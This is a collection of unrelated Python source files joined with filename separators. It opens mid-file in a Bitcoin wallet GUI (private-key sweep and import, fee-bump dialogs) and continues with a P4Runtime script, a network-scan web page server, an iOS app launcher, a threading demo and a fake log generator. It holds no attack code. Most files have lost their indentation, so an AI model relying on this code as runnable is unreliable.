keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
            return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
console.py
|
from src.parse import args as arguments
from threading import Thread
import pathlib as pl
import code
import time
import sys
Off = '\033[0m' # Text Reset
Black = '\033[1;90m' # Black
Red = '\033[1;91m' # Red
Green = '\033[1;92m' # Green
Yellow = '\033[1;93m' # Yellow
Blue = '\033[1;94m' # Blue
Purple = '\033[1;95m' # Purple
Cyan = '\033[1;96m' # Cyan
White = '\033[1;97m' # White
def Interact(globals_var):
if arguments.interactive or arguments.persistent:
t = Thread(target=code.InteractiveConsole(locals=globals_var).interact)
t.start()
return t
return Thread()
def Join(thread: Thread):
if arguments.persistent:
if thread.is_alive():
thread.join(timeout=30)
def Out(*args):
    if not arguments.silent:
        print(str().join(args))
def Log(filename, *args):
try:
with open(filename, "a") as logfile:
logfile.write(f"{Blue}{time.asctime()}{Off}")
[logfile.write(f"\t{statement}\n") for statement in args]
logfile.write('\n')
except FileNotFoundError:
pl.Path(''.join([f"/{i}" for i in filename.split('/')[0:-1] if i != ''])).mkdir(parents=True, exist_ok=True)
Log(filename, args)
def Verbose(*args):
Log(f"{sys.path[0]}/assets/logs/runtime.log")
if arguments.verbose or arguments.very_verbose:
Out(*args)
Log(f"{sys.path[0]}/assets/logs/verbose.log")
|
update_config.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
# SPDX-License-Identifier: Apache-2.0
import argparse
from time import sleep
import grpc
from p4.v1 import p4runtime_pb2
from p4.config.v1 import p4info_pb2
from p4.tmp import p4config_pb2
import google.protobuf.text_format
import struct
import threading
import time
import Queue
parser = argparse.ArgumentParser(description='Mininet demo')
parser.add_argument('--device-id', help='Device id of switch',
type=int, action="store", default=1)
parser.add_argument('--p4info', help='text p4info proto',
type=str, action="store", required=True)
parser.add_argument('--json', help='context json',
type=str, action="store", required=True)
parser.add_argument('--grpc-addr', help='P4Runtime gRPC server address',
type=str, action="store", default='localhost:50051')
parser.add_argument('--loopback',
help='Provide this flag if you are using the loopback '
'P4 program and we will test Packet IO',
action="store_true", default=False)
args = parser.parse_args()
def build_bmv2_config(bmv2_json_path):
"""
Builds the device config for BMv2
"""
device_config = p4config_pb2.P4DeviceConfig()
device_config.reassign = True
with open(bmv2_json_path) as f:
device_config.device_data = f.read()
return device_config
class Test:
def __init__(self):
self.device_id = args.device_id
self.channel = grpc.insecure_channel(args.grpc_addr)
self.stub = p4runtime_pb2.P4RuntimeStub(self.channel)
def update_config(self):
request = p4runtime_pb2.SetForwardingPipelineConfigRequest()
request.device_id = self.device_id
request.election_id.high = 0
request.election_id.low = 1
config = request.config
with open(args.p4info, 'r') as p4info_f:
google.protobuf.text_format.Merge(p4info_f.read(), config.p4info)
device_config = build_bmv2_config(args.json)
config.p4_device_config = device_config.SerializeToString()
request.action = p4runtime_pb2.SetForwardingPipelineConfigRequest.VERIFY_AND_COMMIT
try:
self.stub.SetForwardingPipelineConfig(request)
except Exception as e:
print "Error during SetForwardingPipelineConfig"
print str(e)
return False
return True
def set_up_stream(self):
self.stream_out_q = Queue.Queue()
self.stream_in_q = Queue.Queue()
def stream_req_iterator():
while True:
p = self.stream_out_q.get()
if p is None:
break
yield p
def stream_recv(stream):
for p in stream:
self.stream_in_q.put(p)
self.stream = self.stub.StreamChannel(stream_req_iterator())
self.stream_recv_thread = threading.Thread(
target=stream_recv, args=(self.stream,))
self.stream_recv_thread.start()
self.handshake()
def handshake(self):
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = self.device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = 1
self.stream_out_q.put(req)
rep = self.get_stream_packet("arbitration", timeout=3)
if rep is None:
print "Failed to establish handshake"
def tear_down_stream(self):
self.stream_out_q.put(None)
self.stream_recv_thread.join()
def get_packet_in(self, timeout=3):
msg = self.get_stream_packet("packet", timeout)
if msg is None:
print "Packet in not received"
else:
return msg.packet
def get_stream_packet(self, type_, timeout=1):
start = time.time()
try:
while True:
remaining = timeout - (time.time() - start)
if remaining < 0:
break
msg = self.stream_in_q.get(timeout=remaining)
if not msg.HasField(type_):
continue
return msg
except: # timeout expired
pass
return None
def send_packet_out(self, packet):
packet_out_req = p4runtime_pb2.StreamMessageRequest()
packet_out_req.packet.CopyFrom(packet)
self.stream_out_q.put(packet_out_req)
if __name__ == '__main__':
test = Test()
test.set_up_stream()
test.update_config()
if args.loopback:
packet_out = p4runtime_pb2.PacketOut()
packet_out.payload = "\xab" * 100
test.send_packet_out(packet_out)
test.get_packet_in()
test.tear_down_stream()
|
http-server.py
|
#!/usr/bin/env python
# put into netscan2
from __future__ import division, print_function
import multiprocessing as mp
import time
import bjoern
from jinja2 import Environment
import os
from roku import discover
# try to grab simplejson, if not fall back to the built in json
try:
import simplejson as json
except ImportError:
import json
# loader = jinja2.FileSystemLoader('./index.html')
# env = jinja2.Environment(loader=loader)
# template = env.get_template('')
# fix path for now
# import sys
# sys.path.append("../")
class Watcher(object):
"""
A simple class to watch if a file has changed.
https://stackoverflow.com/questions/182197/how-do-i-watch-a-file-for-changes/49007649#49007649
"""
def __init__(self, watch_file):
"""
watch_file - what file to watch
"""
self._cached_stamp = 0
self.filename = watch_file
def change(self):
"""
Has the file changed?
return True - file has changed
False - the file is still the same
"""
ret = False
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
ret = True
return ret
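# Illustrative sketch (added example): Watcher.change() compares the file's
# mtime against a cached stamp, so a polling loop only re-reads the file when
# it has actually changed, e.g.:
#
#   w = Watcher('network.json')
#   while True:
#       if w.change():
#           with open(w.filename) as fd:
#               data = json.load(fd)
#       time.sleep(1)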
# get network data and watch for update
filename = 'network.json'
watcher = Watcher(filename)
data = {}
page = """
<!DOCTYPE html>
<html>
<header>
<link href="/assets/techno-font.css" rel="stylesheet">
<!--
<link rel="stylesheet" href="https://unpkg.com/purecss@1.0.0/build/pure-min.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
-->
<style>
h1 {
text-align: center;
}
table.center {
margin-left:auto;
margin-right:auto;
}
table {
width: 75%;
border-collapse: collapse;
border: 2px solid gray;
}
th, td {
border: 1px solid black;
}
td, th {
border: 1px solid #ddd;
padding: 8px;
}
tr:nth-child(even){
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
th {
padding-top: 12px;
padding-bottom: 12px;
text-align: left;
background-color: DodgerBlue;
color: white;
}
</style>
</header>
<body>
<i class="tf-archlinux tf-128" style="color:dodgerblue;"></i>
<h1>{{ title }}</h1>
<!-- <table class="pure-table pure-table-striped"> -->
<table class="center">
<tr>
<th> Hostname </th>
<th> Status </th>
<th> IPv4 </th>
<th> MAC </th>
    <th> Manufacturer </th>
<th> Open Ports </th>
</tr>
<tbody>
{% for item in items %}
<tr>
<td>{{item.hostname}}</td>
<td>{{item.status}}</td>
<td>{{item.ip}}</td>
<td>{{item.mac}}</td>
<td>{{item.company}}</td>
<td>{{item.openports}}</td>
</tr>
{% endfor %}
</tbody>
</table>
</body>
</html>
"""
template = Environment().from_string(page)
def readAsset(file_path, kind):
if kind == 'woff':
mime = 'application/font-woff'
elif kind == 'tff':
mime = 'application/font-tff'
elif kind == 'css':
mime = 'text/css'
# get the absolute path to this directory
path = os.path.abspath(os.path.dirname(__file__))
file_path = path + file_path
print(">> reading file: {}".format(file_path))
    # fonts are binary; open them in binary mode so the WSGI response body is bytes
    mode = 'rb' if kind in ('woff', 'tff') else 'r'
    with open(file_path, mode) as fd:
        response_body = fd.read()
response_headers = [
('Content-Type', mime)
]
return (response_headers, response_body)
def app(environ, start_response):
# I don't like globals
global watcher
global filename
global data
try:
# why?
# just run this through shared memory
#
# old network scanner had: hostname, ipv4, mac, company name
# new: hostname, up/down, ipv4, mac, company, ports
if watcher.change():
print(">> updating data from {}".format(filename))
with open(filename) as fd:
data = json.load(fd)
print(data)
else:
print('>> no data change')
except Exception as e:
data = {}
print(e)
print(">> Error loading file: {}".format(filename))
# response_body = urls[environ['PATH_INFO']]
if environ['PATH_INFO'] == '/':
global template
# render html body as a binary string(utf-8)
response_body = template.render(
title="Network {}".format("1.2.3.x"),
items=data).encode('utf-8')
status = b'200 OK'
response_headers = [
(b'Content-Type', b'text/html'),
(b'Content-Length', str(len(response_body)).encode('utf-8'))
]
start_response(status, response_headers)
        return [response_body]
elif environ['PATH_INFO'].find('.css') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'css')
start_response('200 OK', response_headers)
return [response_body.encode('utf-8')]
elif environ['PATH_INFO'].find('.woff') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'woff')
start_response('200 OK', response_headers)
return [response_body]
elif environ['PATH_INFO'].find('.tff') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'tff')
start_response('200 OK', response_headers)
return [response_body]
else:
# raise Exception(">> Invalid path: {}".format(environ['PATH_INFO']))
print(">> Invalid path: {}".format(environ['PATH_INFO']))
        status = '404 Not Found'
response_body = 'Path not valid: {}'.format(environ['PATH_INFO'])
response_headers = [
('Content-Type', 'text/plain'),
('Content-Length', str(len(response_body)))
]
start_response(status, response_headers)
return [response_body.encode('utf-8')]
def scanner(e):
    # periodically discover Roku devices on the network until the event is cleared
    while e.is_set():
print('** scan **')
ans = discover("roku:ecp")
for roku in ans:
print(roku)
time.sleep(5)
print("** scanner shutting down now **")
if __name__ == "__main__":
# start recon thread
e = mp.Event()
e.set()
p = mp.Process(target=scanner, args=(e,), name='scanner')
p.start()
host = "0.0.0.0"
port = 8000
print("Starting on: {}:{}".format(host, port))
bjoern.listen(app, host, port, reuse_port=True)
try:
bjoern.run()
except KeyboardInterrupt:
        # clear the event so the scanner process can exit
e.clear()
p.join(1)
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from oregano_gui.ios_native.monkeypatches import MonkeyPatches
from oregano.util import set_verbosity
from oregano_gui.ios_native import ElectrumGui
from oregano_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from oregano.simple_config import SimpleConfig
from oregano.networks import set_mainnet, set_testnet
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
'testnet': 'EC_TESTNET' in os.environ, # You can set the env when testing using Xcode "Scheme" editor
}
if config_options.get('testnet'):
set_testnet()
else:
set_mainnet()
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Ergon FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from oregano import version, ecc_fast, schnorr
NSLog("Oregano lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
NSLog("Fast ECC: %s Fast Schnorr: %s", str(ecc_fast.is_using_fast_ecc()), str(schnorr.has_fast_sign()))
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
1.thread.py
|
'''
Note: running tasks concurrently in multiple threads takes less time than running them sequentially in a single thread.
'''
import time
from queue import Queue
from threading import Thread
def req1(param):
time.sleep(1)
return param
def main1():
return [req1(1), req1(2)]
def req2(param, res_value: Queue):
time.sleep(1)
res_value.put(param)
def main2():
res_value = Queue()
tasks = [Thread(target=req2, args=(1, res_value)),
Thread(target=req2, args=(2, res_value))]
for i in tasks:
i.start()
for i in tasks:
i.join()
return [res_value.get() for i in tasks]
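def main3():
    # Added illustrative alternative (not in the original): the same two
    # concurrent requests expressed with concurrent.futures, which returns the
    # results in input order without an explicit Queue.
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=2) as pool:
        return list(pool.map(req1, [1, 2]))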
if __name__ == '__main__':
t1 = time.time()
res1 = main1()
t2 = time.time()
res2 = main2()
t3 = time.time()
    print(f'main1 result: {res1}\ttime: {round(t2-t1,1)}')
    print(f'main2 result: {res2}\ttime: {round(t3-t2,1)}')
'''
Expected output:
main1 result: [1, 2]    time: 2.0
main2 result: [2, 1]    time: 1.0
'''
|
generate.py
|
import argparse
import datetime
import glob
import logging
import os
import random
import signal
import sys
import threading
import time
import faker
from typing import List, Union
import yaml
from jsonschema import validate, ValidationError
fake = faker.Faker()
class Generator:
"""
Generator class for log creation.
"""
def __init__(self, conf_dir: str, truncate: bool = False):
self.conf_dir = conf_dir.rstrip("/")
self.events = []
self.logger = logging.getLogger()
self.running = False
self.reload = True
self.truncate = truncate
        with open(os.path.join(os.path.dirname(__file__), "schema.yaml")) as schema_file:
            self.schema = yaml.safe_load(schema_file)
def handle_signal(self, sig: int, _) -> None:
"""
Handles signals to either exit or reload configuration files.
"""
if sig == signal.SIGHUP:
self.logger.info("Receiving SIGHUP({:d}), reloading config...".format(sig))
self.truncate = False
self.reload = True
elif sig == signal.SIGINT:
self.logger.critical("Receiving SIGINT({:d}), exiting...".format(sig))
self.stop()
def run(self) -> None:
self.running = True
self.reload = True
self.logger.info("Starting normal execution")
# Block while running
while self.running:
if self.reload:
# Stop constant reloading
self.reload = False
self.stop_generating()
self.events = []
# Load the configuration files
for config_file in Generator.gather_configs(self.conf_dir):
try:
event = threading.Event()
config = Generator.load_config(config_file, self.schema)
# Skip over disabled configurations
if not config["enabled"]:
self.logger.info("Skipped: {:s}".format(config_file))
continue
self.logger.info("Loaded: {:s}".format(config_file))
threading.Thread(
target=self.generate_log_entry, args=(event, config)
).start()
self.events.append(event)
except ValidationError as err:
self.logger.critical(
"Invalid configuration file: {:s}".format(config_file)
)
self.logger.critical(err)
def stop(self) -> None:
self.running = False
self.stop_generating()
def stop_generating(self) -> None:
for event in self.events:
event.set()
@staticmethod
def gather_configs(config_dir: str):
if not os.path.exists(config_dir):
raise FileNotFoundError(f"No such file or directory: {config_dir!r}")
elif os.path.isfile(config_dir):
return [config_dir]
else:
return glob.glob(f"{config_dir}/*.yaml")
@staticmethod
def load_config(config_file: str, schema: dict) -> dict:
with open(config_file, "r") as stream:
config = yaml.safe_load(stream)
validate(config, schema)
config.setdefault("enabled", True)
config.setdefault("offset", {"seconds": 0})
config.setdefault("jitter", {"seconds": 0})
config.setdefault("fields", {})
config["frequency"] = datetime.timedelta(**config["frequency"])
config["offset"] = datetime.timedelta(**config["offset"])
config["jitter"] = datetime.timedelta(**config["jitter"])
for name in config["fields"]:
config["fields"][name].setdefault("count", 0)
return config
@staticmethod
def get_timestamps(
config: dict, timestamp: datetime.datetime
) -> List[datetime.datetime]:
timestamp -= config["offset"]
timestamps = []
for _ in range(config["amount"]):
seconds = random.randint(0, config["jitter"].total_seconds())
timestamps.append(timestamp - datetime.timedelta(seconds=seconds))
return sorted(timestamps)
@staticmethod
def next_value(config: dict, name: str) -> str:
"""
Get the next value for the field.
:param dict config: Configuration dictionary
:param str name: Name of the field
"""
fields = config["fields"]
fields[name]["count"] += 1
# If the value should be repeated
if "value" in fields[name] and "repeat" in fields[name]:
if fields[name]["count"] <= fields[name]["repeat"]:
return fields[name]["value"]
else:
fields[name]["count"] = 0
# If the value should change
if "value" in fields[name] and "change" in fields[name]:
if random.random() > fields[name]["change"]:
return fields[name]["value"]
else:
fields[name]["count"] = 0
# Determine the value
fields[name]["value"] = Generator.get_value(config, name)
return fields[name]["value"]
@staticmethod
def get_value(config: dict, name: str) -> Union[str, None]:
"""
Generate a value based on field type.
:param dict config: Configuration dictionary
:param str name: Name of the field
"""
field = config["fields"][name]
if field["type"] == "enum":
return str(random.choice(field["values"]))
elif field["type"] == "chance":
options = [i["option"] for i in field["choices"]]
weights = [i["weight"] for i in field["choices"]]
return str(random.choices(options, weights)[0])
elif field["type"] == "integer":
return str(random.randint(field["min"], field["max"]))
elif field["type"] == "float":
return str(random.uniform(field["min"], field["max"]))
elif field["type"] == "timestamp":
return config["timestamp"].strftime(field["format"])
elif field["type"] == "ip":
return ".".join(str(random.randint(0, 255)) for _ in range(4))
elif field["type"] == "fakename":
return fake.name()
else:
return None
def generate_log_entry(self, event: threading.Event, config: dict) -> None:
# Create the directory if not there
if not os.path.exists(os.path.dirname(config["file"])):
os.makedirs(os.path.dirname(config["file"]))
# Truncate the log file
if self.truncate:
with open(config["file"], "w") as log_file:
log_file.truncate()
else:
with open(config["file"], "a"):
os.utime(config["file"], None)
time.sleep(0)
while not event.wait(config["frequency"].total_seconds()):
self.logger.info(
'Writing %4d logs for "%s" (%s)'
% (config["amount"], config["name"], config["file"])
)
for timestamp in self.get_timestamps(config, datetime.datetime.utcnow()):
config["timestamp"] = timestamp
values = {
field: self.next_value(config, field) for field in config["fields"]
}
log_entry = config["format"].format(**values)
